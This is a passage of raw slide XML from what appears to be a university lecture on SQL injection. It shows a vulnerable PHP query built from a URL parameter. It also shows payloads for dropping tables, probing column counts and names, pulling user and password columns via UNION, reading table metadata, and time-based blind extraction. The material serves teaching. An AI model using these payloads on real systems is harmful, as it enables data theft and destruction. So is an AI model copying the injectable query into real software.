          <a:xfrm>
            <a:off x="869577" y="2226235"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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id = $_GET['id']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getid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= "SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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‘$id’"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result =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mysql_query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($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getid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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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1981200" y="4800600"/>
            <a:ext cx="5410200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23413"/>
              <a:gd name="adj2" fmla="val -86289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lvl="1"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Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>′  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>;  DROP TABLE  Users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>- #  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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212" y="6308209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 not verified, but you get the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37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Table Layout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Column numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Column names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Querying other tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Querying database metadata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7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Probing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of Columns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ORDER BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;number&gt; can be added to an SQL query to order results by a column.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65038" y="2819400"/>
            <a:ext cx="6934200" cy="9144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select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first_name,last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 ORDER BY 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Snip Single Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860238" y="3992563"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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id = $_GET['id']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getid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= "SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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‘$id’"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result =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mysql_query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($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getid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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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54703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Security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1052927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(By Threat Model)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575045"/>
            <a:ext cx="1600200" cy="23042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091952"/>
            <a:ext cx="2182611" cy="1270475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162300" y="2360624"/>
            <a:ext cx="2819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162300" y="2727189"/>
            <a:ext cx="2819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03556" y="2969870"/>
            <a:ext cx="1395000" cy="1395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0" y="45059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Malicious Client Attacking Server</a:t>
            </a:r>
            <a:endParaRPr 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-1" y="5105400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SQL Injection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736" y="5543149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File System Traversal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-7884" y="5958994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Broken Access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24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Probing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of Columns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00163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ORDER BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;number&gt; can be added to an SQL query to order results by a column.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30</a:t>
            </a:fld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762000" y="2667000"/>
            <a:ext cx="7543800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>getid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 = “SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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‘$id’”;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...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62000" y="4495800"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1165038" y="4495800"/>
              <a:ext cx="6934200" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name,last_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ ORDER BY 1;#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200" y="4521200"/>
              <a:ext cx="70742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accent5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n-US" sz="5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62000" y="5588000"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1165038" y="4495800"/>
              <a:ext cx="6934200" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name,last_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ ORDER BY 3;#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200" y="4521200"/>
              <a:ext cx="5822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endParaRPr lang="en-US" sz="54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80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Probing Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Names</a:t>
            </a:r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00163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query with an incorrect column name will give an error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31</a:t>
            </a:fld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762000" y="2667000"/>
            <a:ext cx="7543800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>getid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 = “SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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‘$id’”;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...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62000" y="4495800"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1165038" y="4495800"/>
              <a:ext cx="6934200" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name,last_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ or </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> IS NULL;#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200" y="4521200"/>
              <a:ext cx="70742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accent5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n-US" sz="5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62000" y="5588000"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1165038" y="4495800"/>
              <a:ext cx="6934200" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name,last_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ or </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>firstname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> IS NULL;#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200" y="4521200"/>
              <a:ext cx="5822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endParaRPr lang="en-US" sz="54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6815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extra tables with UNION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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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57200" y="1300163"/>
            <a:ext cx="8229600" cy="4754563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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&lt;query 1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;query 2&gt; can be used to construct a separate query 2.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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800100" y="2667000"/>
            <a:ext cx="7543800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1"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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>getid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 = “SELECT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first_name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last_name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FROM users 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	    WHERE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user_id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= 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‘$id’”;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...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98581" y="4495800"/>
            <a:ext cx="7946838" cy="1502516"/>
            <a:chOff x="152400" y="4495800"/>
            <a:chExt cx="7946838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1165038" y="4495800"/>
              <a:ext cx="6934200" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name,last_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ UNION select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user,password</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mysql.users</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>;#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400" y="4521200"/>
              <a:ext cx="1036562" cy="880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 smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5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n-US" sz="88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1407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Database Metadata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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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57200" y="1300163"/>
            <a:ext cx="8229600" cy="4754563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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There are database-specific ways to get layout information.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61720" y="2590800"/>
            <a:ext cx="6553200" cy="1360858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first_name,last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>all_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(For Oracle PL/SQL)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743200" y="4495800"/>
            <a:ext cx="5792058" cy="151320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/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>pentestmonkey.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/category/cheat-sheet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>-injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563166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Blind SQL Injection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189" y="1418949"/>
            <a:ext cx="1600200" cy="2304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021" y="5029200"/>
            <a:ext cx="911250" cy="12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941128"/>
            <a:ext cx="2182611" cy="12704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162300" y="2209800"/>
            <a:ext cx="2819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86600" y="3810000"/>
            <a:ext cx="372595" cy="114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7715646" y="3429000"/>
            <a:ext cx="209154" cy="152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162300" y="2576365"/>
            <a:ext cx="2819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1400" y="1806309"/>
            <a:ext cx="16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user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=5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65998" y="4234146"/>
            <a:ext cx="354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FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=5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33361" y="3774173"/>
            <a:ext cx="13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dbrumley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28009" y="2631180"/>
            <a:ext cx="13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dbrumley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3216275" y="1606667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3140075" y="4241947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8234557" y="3332455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3478013" y="2673565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24256" y="2926933"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Multiply 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3789015" y="2061274"/>
            <a:ext cx="1482143" cy="1509143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20563" y="5287828"/>
            <a:ext cx="4914900" cy="948399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Sometimes results of SQL queries are not sent back to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392755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Blind SQL Injection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 smtClean="0"/>
              <a:t>Defn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> SQL injection attack is an attack against a server that responds with generic error page or even nothing at all.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Approach: ask a series of True/False questions, exploit side-channels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78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Blind SQL Injection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189" y="1418949"/>
            <a:ext cx="1600200" cy="2304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021" y="5029200"/>
            <a:ext cx="911250" cy="12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941128"/>
            <a:ext cx="2182611" cy="12704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162300" y="2209800"/>
            <a:ext cx="2819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848600" y="3322637"/>
            <a:ext cx="1" cy="163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93338" y="1563469"/>
            <a:ext cx="3810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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> delay ‘0:0:5’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37749" y="3925669"/>
            <a:ext cx="3810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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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2328213" y="1370519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3611826" y="3933470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24256" y="2926933"/>
            <a:ext cx="1219200" cy="1219200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1143000" y="4979276"/>
            <a:ext cx="4572000" cy="9906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If the first letter of the username is A (65), there will be a 5 second delay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57200" y="435255"/>
            <a:ext cx="2290111" cy="1142201"/>
            <a:chOff x="457200" y="435255"/>
            <a:chExt cx="2290111" cy="1142201"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Right Arrow 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1346787">
              <a:off x="1909111" y="1067598"/>
              <a:ext cx="838200" cy="509858"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow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57200" y="435255"/>
              <a:ext cx="1676400" cy="914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Actual MySQL syntax!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275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Blind SQL Injection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189" y="1418949"/>
            <a:ext cx="1600200" cy="2304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021" y="5029200"/>
            <a:ext cx="911250" cy="12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941128"/>
            <a:ext cx="2182611" cy="12704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162300" y="2209800"/>
            <a:ext cx="2819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848600" y="3322637"/>
            <a:ext cx="1" cy="163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93338" y="1563469"/>
            <a:ext cx="3810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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> delay ‘0:0:5’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37749" y="3925669"/>
            <a:ext cx="3810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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
